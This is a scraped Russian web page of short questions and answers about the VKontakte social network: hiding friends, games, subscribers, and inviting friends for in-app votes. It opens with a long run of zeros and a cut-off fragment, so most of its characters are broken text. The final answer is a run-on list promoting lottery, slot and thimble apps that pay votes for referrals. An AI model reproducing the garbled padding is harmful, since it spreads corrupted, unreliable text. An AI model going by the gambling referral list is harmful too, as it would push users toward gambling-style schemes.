0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 лет не нужна

Вконтакте опять придумали эту хрень про друзей! Как всё-таки скрыть всех друзей????

Никак, максимум 15. Администрация вконтакта плевать хотела на своих пользователей, они думают что такая политика поможет им потягаться с фейсбуком. А вообще забудьте вы про эту быдло-социальную сеть. Уже все давно есть в современном фейсбуке.

какой нападающий Авангарда вконтакте в счастливом фермере никак горох собрать не может?

Блин,респект Вам с уважухой болелы Авангарда- хоть бы немного здесь таких же осведомленных девчонок из Казани с Нижнекамском.От Барсовско-Нефтехимического фана(и такое бывает.)))

какая игра вконтакте самая лучшая

лучше не играй, потом из этих игр не вылезешь

как сделать вконтакте чтобы люди не добавляли меня в друзья , а чтобы сразу подписывались??

никак, и смысла нет) когда они висят типа добавляются (ждут когда ты их добавишь) они уже подписаны

как пригласить друга вконтакт и что бы за это дали рейтинг?)

Найдите человека при помощи поиска и нажмите кнопку «Добавить в друзья» рядом с его именем в списке найденных или на его странице под фотографией. Вашему другу придет оповещение, и после подтверждения он появится в списке друзей. Колесо Фортуны 2 друга = 1 голос (При условии, что они сыграли хотябы 1 раз) В аукционе 3 друга = 1 голос Удачливое приложение. Лотерея. Розыгрыш бесплатных голосове 5 друзей = 1 голос Однорукий бандит. Честная игра на голоса ВКонтакте 10 друзей = 1 голос Голоса без лотереи!Жми скорее! 15 друзей = 1 голос Время на голоса 15 друзей = 1 голос Камень-Ножницы-Бумага - лотерея на голоса 20 друзей = 1 голос Азартная игра Наперстки на голоса 20 друзей = 1 голос Обычный столбик на обычные голоса 20 друзей = 1 голос KENO -популярная лотерея, главный приз 3000 голосов! 0,2 голоса за каждого друга, который сыграет хотя бы один раз Аукцион на голоса» 2.0 Конкурс кто больше пригласит друзей. За 1е место - 300 голосов. Подробности на странице с приложением Моментальная лотерея Госпожа Удачи получаете 10% от ставок приглашенных вами друзей Мне повезёт [В] контакте получаете 10% от их выигрыша приглашенных вами друзей Счастливые кости 2.0 За 5 друзей можно сыграть на голоса...



Комментариев нет:

Отправить комментарий